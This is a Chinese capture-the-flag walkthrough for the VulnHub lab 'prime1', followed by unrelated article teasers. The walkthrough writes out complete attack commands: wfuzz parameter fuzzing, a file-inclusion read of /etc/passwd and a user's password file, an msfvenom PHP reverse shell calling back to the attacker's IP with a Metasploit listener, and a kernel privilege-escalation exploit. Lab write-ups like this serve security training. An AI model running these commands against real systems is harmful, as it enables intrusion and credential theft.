prime1--vulnhub靶场通关教程

news2024/11/25 0:58:42

一. 信息收集

1. 探测目标主机IP地址

arp-scan -l  //查看网段

vm  编辑--查看虚拟网络编辑器,看到靶机的网段

网段是: 192.168.83.0

是c段网络

2. 全面检测目标IP

nmap -sP 192.168.83.1/24

靶机ip是:

192.168.83.145

攻击机的ip是:

192.168.83.136

3.扫描端口

端口和服务是对应关系的根据计算机网络的应用层协议

扫描端口

nmap -p 1-65535 -A 192.168.83.145

看到了22端口--ssh协议 和80端口--http服务打开

访问页面

4.目录扫描

dirb http://192.168.83.145

得到信息常见字典:/usr/share/dirb/wordlists/common.txt

查看字典内容:less /usr/share/dirb/wordlists/common.txt

还看到了wordpress的信息这个是个人博客搭建的常用方式

还有个dev的信息看不懂可能存在有用信息

知识点:

curl 是一个常用的命令行工具,用于从或向服务器传输数据,支持多种协议,如 HTTP、HTTPS、FTP 等。它经常用于发送请求到 Web 服务器并获取响应,或者用于自动化脚本和文件传输。

curl http://192.168.83.145/dev

译文:

你好,

现在你处于0级阶段。

在现实生活中的渗透测试中,我们应该使用我们的工具来深入挖掘一个网站。

祝你黑客行动愉快。

5.扫描文件名后缀为.txt

dirb操作-X指定文件后缀,对.txt,.cfg等文件后缀中存放有用的信息

man dirb 操作指令书

dirb http://192.168.83.145 -X .txt,.php,.zip

扫到了secret.txt

查看内容

curl http://192.168.83.145/secret.txt

译文:看起来你得到了一些秘密。

好吧,我只是想帮你一下。

对你找到的每个PHP页面进行更多的模糊测试。如果你得到了任何正确的参数,就按照下面的步骤操作。如果你还是卡住了,
那就从这里学习一个对OSCP很有用的基础工具。

Fuzzing/Fuzz_For_Web at master · hacknpentest/Fuzzing · GitHub

//查看location.txt文件,你将得到下一步的行动指示//

注意:kali是自带fuzz的工具的 z

二. 渗透过程

1.爆破参数

页面index.php,参数para,访问文件location.php

Wfuzz -w  /usr/share/dirb/wordlists/common.txt http://192.168.83.145/index.php?FUZZ

得到4614返回参数包

wfuzz -w /usr/share/dirb/wordlists/common.txt --hw 12 http://192.168.83.145/index.php?FUZZ

过滤掉返回参数为200个字的得到参数file

2.读取文件

看到file参数想到文件读取

curl http://192.168.83.145/index.php?file=location.txt

读取内容

翻译

hnp security 做得更出色一些
好的,现在你找到了确切的参数
现在继续深入挖掘下一个参数
在其他的PHP页面上使用'secrettier360'参数,会有更多乐趣。

curl http://192.168.83.145/image.php?secrettier360

Image.php是之前dirb扫到的

读取敏感文件(Linux系统)

密码:/etc/passwd

配置 /etc/my.ini

查看 /etc/passwd

curl http://192.168.83.145/image.php?secrettier360=/etc/passwd

curl http://192.168.83.145/image.php?secrettier360=/home/saket/password.txt

读取密码

密码是:   follow_the_ippsec

之前扫到了ssh,http wordpress,那密码对应的是什么服务呢

尝试:

ssh -p 22 victor@192.168.83.145

登录失败了

3.Wordpress登录尝试

wpscan --url http://192.168.83.145/wordpress/ --enumerate u  

扫描用户

wordepress登录

登录成功了

在主题编辑器提权

找到可以上传php代码的界面了

4.反弹shell控制靶机

Msf:漏洞库、攻击脚本、提权脚本

Msf生成反弹链接的 payload

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.83.136 lport=7777 -o shell.php

生成php反弹shell脚本

注意ip地址是攻击机和端口设置

msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

payload => php/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 192.168.83.136

lhost => 192.168.83.136

msf6 exploit(multi/handler) > set lport 7777

lport => 7777

msf6 exploit(multi/handler) > exploit

开始监听监听

访问页面

http://192.168.83.145/wordpress/wp-content/themes/twentynineteen/secret.php

监听成功拿到权限

三. Linux提权

1. 确定操作系统信息

Sysinfo

2. 搜索操作系统漏洞

继续使用searchsploit工具搜索漏洞 ,打开另一个终端

searchsploit Ubuntu 16.04

searchsploit简介

漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法

查到对应版本的漏洞

Privilege Escalation(提权),这里我们使用通用4.4.x版本的提权方式,完整path

这个文件路径记一下比较好

cp /usr/share/exploitdb/exploits/linux/local/45010.c ./

复制漏洞到当前文件夹中

gcc 45010.c -o 45010

编译提权脚本

切换到meterpreter终端即再打开一个msf

upload /home/kali/Desktop/45010 /tmp/45010

上传到/tmp目录下

添加执行的权限

Chmod +x 45010

./45010执行

拿到权限了

不知道为什么执行c文件失败了就差最后一步了可惜

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1634707.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

邦注科技 模具清洗机 干冰清洗机 干冰清洗设备原理介绍

干冰清洗机,这款神奇的清洁设备,以干冰颗粒——固态的二氧化碳,作为其独特的清洁介质。它的工作原理可谓独具匠心,利用高压空气将干冰颗粒推送至超音速的速度,犹如一颗颗银色的流星,疾速喷射至待清洗的物体…

【大模型系列】指令微调

概述 指令微调(Instruction Tuning)是指使用自然语言形式的数据对预训练后的大语言模型进行参数微调,22年谷歌ICLR论文中提出这个概念。在其它文献中,指令微调也被称为有监督微调(Supervised Fine-tuning)…

Python-VBA函数之旅-object基类(非函数)

目录 一、object基类的常见应用场景 二、object基类使用注意事项 三、如何用好object基类? 1、object基类: 1-1、Python: 1-2、VBA: 2、推荐阅读: 个人主页:神奇夜光杯-CSDN博客 一、object基类的…

YOLOV8 pycharm

1 下载pycharm 社区版 https://www.jetbrains.com/zh-cn/pycharm/download/?sectionwindows 2 安装 3 新建 4 选择 文件-> setting 配置环境变量 5 添加conda 环境

MyBatis-plus笔记——常用注解

TableName 在开发的过程中,我们经常遇到以上的问题,即实体类所对应的表有固定的前缀,例如 t_ 或 tbl_ 此时,可以使用 TableName 指定表前缀 Data TableName("t_user") public class User {private Long id;private Stri…

起薪4万的AI产品经理,必须掌握的技术模型与3大知识体系

这是求职产品经理系列的第170篇文章 一、AI行业的招聘趋势以及人才紧缺度 根据脉脉《2023年人才报告》显示:人工智能成为2022最缺人行业,⼈⼯智能⾏业的⼈才紧缺指数(⼈才需求量/⼈才投递量)为0.83,也就是说这个领域人…

react props传参

props是父子传参的常用方法。 一、主要功能 1.传参 定义:父级组件向子级组件传递参数。 2.验证数据类型格式 定义:可以指定父组件传递过来数据为指定类型。 3.设置默认值 定义:在参数未使用时,直接默认为指定值。 二、实例代…

了解DDM/DOM在光收发器中的重要性

在光网络领域,DDM/DOM是不可或缺的技术,确保了光收发器的最佳性能和可靠性。了解 DDM/DOM 的重要性对于该领域的专业人员至关重要,因为这些技术提供了对光通信系统运行状况和功能的实时洞察。让我们深入研究 DDM/DOM 的复杂性,探索…

Deckset for Mac激活版:MD文档转幻灯片软件

Deckset for Mac是一款专为Mac用户打造的Markdown文档转幻灯片软件。它凭借简洁直观的界面和强大的功能,成为许多用户的心头好。 Deckset for Mac激活版下载 Deckset支持Markdown语法,让用户在编辑文档时无需分心于复杂的格式设置,只需专注于…

前端请求没问题,后端正常运行,但查不出数据

写代码时写得快了些,Orders.的订单状态写错了CONFIRMED 改成COMPLETED

python-pytorch官方示例Generating Names with a Character-Level RNN的部分理解0.5.03

pytorch官方示例Generating Names with a Character-Level RNN的部分理解 模型结构功能关键技术模型输入模型输出预测实现 模型结构 功能 输入一个类别名和一个英文字符,就可以自动生成这个类别,且以英文字符开始的姓名 关键技术 将字符进行one-hot编…

翻译《The Old New Thing》 - BOOL vs. VARIANT_BOOL vs. BOOLEAN vs. bool

BOOL vs. VARIANT_BOOL vs. BOOLEAN vs. bool - The Old New Thing (microsoft.com) Raymond Chen 2004年12月22日 BOOL、VARIANT_BOOL、BOOLEAN 和 bool 的比较 简要 文章讨论了在编程中表示布尔值的几种不同方式,以及它们的起源和应用场景。 正文 为何会有如此…

STM32学习和实践笔记(22):PWM的介绍以及在STM32中的实现原理

PWM是 Pulse Width Modulation 的缩写,中文意思就是脉冲宽度调制,简称脉宽调制。它是利用微处理器的数字输出来对模拟电路进行控制的一种非常有效的技术,其控制简单、灵活和动态响应好等优点而成为电力电子技术最广泛应用的控制方式&#xff…

Java从菜鸟到高手①

目录 1.数据类型 2.定义变量 2.1.编码方式 2.2.布尔型变量boolean 2.3.隐式类型转化和强制类型转化 2.4类型提升 3.字符串类型 4.运算符 4.1.取余 4.2. ,- 4.3逻辑运算&& || ! 4.4.位运算 4.5.条件运算符 1.数据类型 Java中&#…

特征融合篇 | YOLOv8 引入动态上采样模块 | 超过了其他上采样器

本改进已集成到YOLOv8-Magic 框架 论文名称:《Learning to Upsample by Learning to Sample》 论文地址:https://arxiv.org/abs/2308.15085 代码地址:https://github.com/tiny-smart/dysample 我们提出了 DySample,一种超轻量级且有效的动态上采样器。尽管最近基于内核的…

解决Linux CentOS 7安装了vim编辑器却vim编辑器不起作用、无任何反应

文章目录 前言一、解决vim不起作用(卸载重新安装)1.重新安装vim2.测试vim是否能正常使用 二、解决vim: error while loading shared libraries: /lib64/libgpm.so.2: file too short报错三、解决vim编辑器不能使用方向键和退格键问题 remove vim-common …

3分钟搭建专属于你的ChatGPT

本文首发于公众号 极客枫哥 ,日更分享各种好玩的软件、编程知识和个人成长故事 我是枫哥,搭建自己的 ChatGPT 是一件非常有意思的事情,你不仅可以学习到如何搭建的过程也可以将它扩展成一个收费版的 AI 网站,提供给其他人使用&…

Burp自定义插件实现请求拦截

在安全测试时,经常需要对请求进行拦截以及配置管理,以便过滤域名或路径的请求。例如:被测对象会不断收集信息(例如IP地址、设备信息)通过HTTP传给服务端。本文将介绍如何使用Burp Suite的扩展插件,通过开发…

人工 VS AGV无人搬运机器人,AGV赋能中国智能制造

agv 机器人作为智能制造的重要抓手,正在渗透到各个传统行业,成为我国制造业转型升级的焦点。未来,智能AGV将不仅仅是简单的把货物搬运到指定的位置,而是要把5G技术、大数据、物联网、云计算等贯穿于产品的设计中,让智能…

ElasticSearch总结1

目录 一、ElasticSearch介绍: 举例一: 举例二: 举例三: 二、ELK技术栈 三、Elasticsearch 的基本概念: 四、正向索引和倒排索引: 正向索引: 倒排索引: 五、Mysql和Elastics…